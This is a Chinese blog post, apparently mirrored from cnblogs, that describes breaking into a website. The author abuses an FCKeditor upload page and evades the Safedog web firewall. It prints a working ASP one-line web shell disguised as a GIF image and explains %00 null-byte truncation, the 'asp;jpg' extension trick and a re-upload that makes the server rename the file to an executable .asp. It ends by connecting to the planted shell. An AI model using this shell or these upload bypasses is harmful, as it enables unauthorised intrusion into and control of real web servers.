zoukankan      html  css  js  c++  java
  • 实战入侵(突破FCK+安全狗上传)

    PS:有点尴尬,二次上传突破FCK,免杀马儿过狗。

    刚开始和超霸一起弄,TMDGB.弄到四点多,早上尼玛七点多的又去考试,虽然考试还是睡着了,但是TMDGB感觉日子好充实啊!

    FCK上传地址如下所示:

    http://www.xxx.cn/fckeditor/editor/filemanager/connectors/uploadtest.html

    先准备好一个过狗一句话:

    <%if request ("1")<>""then session("1")=request("1"):end if:if session("1")<>"" then execute session("1")%>GIF89A 
    #密码1

    将马儿保存为jpg格式,上传后抓包。

    选择%00右键

    然后发送。然后就会变成这个样子

    这里涉及到两个知识,

    1.%00的意思是将“;jpg”进行截断,也就是舍去,不要它。

    2.为啥是DEF.asp;jpg呢?这里其实就是突破FCK的重点了。为啥呢?因为FCK会逮住小数点后面的名称。如果是asp肯定能是不行的,所以要承接一个图片的,因为这个图片是要给FCK看的。如果后面的不是他运行的格式,也肯定不让你上传。

    过狗上传

    那么过狗的姿势呢?其实很简单。如下所示


     


    然后发送GO。

     

    注意!

    上传成功后返回的路径是:/upfile//DEF.asp_;jpg

    这个显然不能被解析!而且会被安全狗拦截!

    很简单因为DEF.asp_;jpg。在安全狗里面IIS6.0的解析漏洞是没办法利用的。就算是http://www.xishaonian.com/1.asp/1.jpg也是不可以连接的!

     那我们再GO一次!

     

    然后你会惊奇的发现。

    文件被改名成了:/upfile//DEF(1).asp

    这里又涉及到一个重命名的知识点,当你本地建立一个已有的文件windows就会给你重命名。(PS:其实之前那个没有被删,只是不让你访问罢了.)

    由upfile//DEF.asp_;jpg

    重命名成了

    /upfile//DEF(1).asp

    为啥_;jpg没有了呢。很简单被我们的%00给截断了的。所以也就是upfile/def.asp被重命名为upfile/def(1).asp的过程。

    那么我们现在访问一下。

    如图所示。成功了的!直接拿菜刀连接。

    拿下!

    通过两天才拿下,这里还有几个小的知识点要总结的。

  • 相关阅读:
    Android深度探索-卷1 第三章
    Android深度探索-卷1 第四章
    Android深度探索-卷1 第二章
    Android深度探索-卷1 第一章
    硬件抽象层HAL
    嵌入式Linux调试技术
    蜂鸣器驱动
    控制发光二极管
    搭建S3C6410开发板的测试环境
    统计单词个数
  • 原文地址:https://www.cnblogs.com/xishaonian/p/6219819.html
Copyright © 2011-2022 走看看